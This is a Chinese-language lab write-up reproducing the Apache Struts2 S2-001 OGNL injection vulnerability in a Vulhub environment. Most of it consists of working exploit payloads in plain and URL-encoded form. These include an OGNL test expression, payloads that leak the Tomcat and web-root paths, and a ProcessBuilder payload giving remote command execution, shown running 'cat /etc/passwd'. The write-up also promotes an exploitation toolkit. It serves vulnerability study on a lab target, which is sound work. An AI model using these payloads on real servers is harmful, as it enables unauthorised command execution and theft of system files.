VulHub中的S2-001复现
0X00-引言
那里有什么大佬,不过是脚本小子罢了🐱🏍
脚本至上😍
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)
0X02-漏洞描述
该漏洞用户提交表单数据并且验证失败时,使用聚合用户之前提交的参数值 OGNL 表达式 %{value} 进行解析,然后重新填充到响应的表单数据中。例如注册或登录页面,提交失败后台数据一般会默认返回之前提交的,原因是重复使用了%{value}对提交的数据执行了一次OGNL表达式解析,所以可以直接构造Payload进行命令执行。
影响版本:Struts 2.0.0 - Struts 2.0.8
0X03-漏洞复现
01-测试漏洞是否存在
将payload填入表单
payload:%{2+2}
提交回显
运算出结果,漏洞存在
02-获取tomcat执行路径
burpsuite抓包发到repeater
输入payload:
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
url编码之后
%25%7b%22%74%6f%6d%63%61%74%42%69%6e%44%69%72%7b%22%2b%40%6a%61%76%61%2e%6c%61%6e%67%2e%53%79%73%74%65%6d%40%67%65%74%50%72%6f%70%65%72%74%79%28%22%75%73%65%72%2e%64%69%72%22%29%2b%22%7d%22%7d
成功
03-获取web路径
payload
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
url编码:
%25%7b%23%72%65%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%71%75%65%73%74%28%29%2c%23%72%65%73%70%6f%6e%73%65%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%72%65%73%70%6f%6e%73%65%2e%70%72%69%6e%74%6c%6e%28%23%72%65%71%2e%67%65%74%52%65%61%6c%50%61%74%68%28%27%2f%27%29%29%2c%23%72%65%73%70%6f%6e%73%65%2e%66%6c%75%73%68%28%29%2c%23%72%65%73%70%6f%6e%73%65%2e%63%6c%6f%73%65%28%29%7d
04-执行任意命令
payload可以修改,参数为
new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"}
修改为
new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"}
payload
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
url编码
%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%70%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d
执行cat /etc/passwd
0X04-工具检测
强推一款工具,极其强大,具有六种OA,中间件,还有五种数据库的漏洞利用,甚至可以更换皮肤,且在保持更新
上链接:https://github.com/Liqunkit/LiqunKit_
0X05-查看日志
查看容器ID-进入容器
docker ps #查看容器ID
docker exec -it 910e341b0e88 /bin/bash #进入
cat localhost_access_log.2021-12-01.txt #查看日志
exit #退出容器
